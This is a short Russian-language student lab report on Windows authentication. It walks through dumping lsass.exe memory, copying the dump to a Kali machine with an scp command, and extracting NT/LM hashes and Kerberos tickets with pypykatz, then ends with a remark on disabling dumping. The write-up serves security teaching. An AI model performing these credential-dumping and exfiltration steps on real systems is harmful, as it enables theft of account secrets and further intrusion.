## Занятие 3. ААА в Windows
### Практическая работа №3 ААА в Windows
Нажимаем "создать файл дампа", он сохраниться здесь C:\\Users\\ADMpetr\\AppData\\Local\\Temp\\lsass.DMP

Т.к. я нажал несколько раз, создался уже третий дамп

Файл /home/user в кали



Авторизовавшись под администртором захожу в командную строку и выполняю следующую команду scp C:\\Users\\ADMpetr\\AppData\\Local\\Temp\\lsass.DMP user@192.168.10.9:/home/user
Видим, что на линуксе появился файл

С помощью git clone https://github.com/skelsec/pypykatz скачиваем скрипт pypykatz


Выполняем скачанный скрипт к файлу lsass.DMP

Процесс lsass.exe хранит в себе огромное количесвто конфиденциальной информации.
На скриншоте видны NT и LM хеши, билеты протокола Kerberos, зашифрованные пароли.
Чтобы сдампить процесс нужен доступ к локальному администратору.
Дамп предусмотрен в Windows, поэтому безопаснее выключать эту возможность.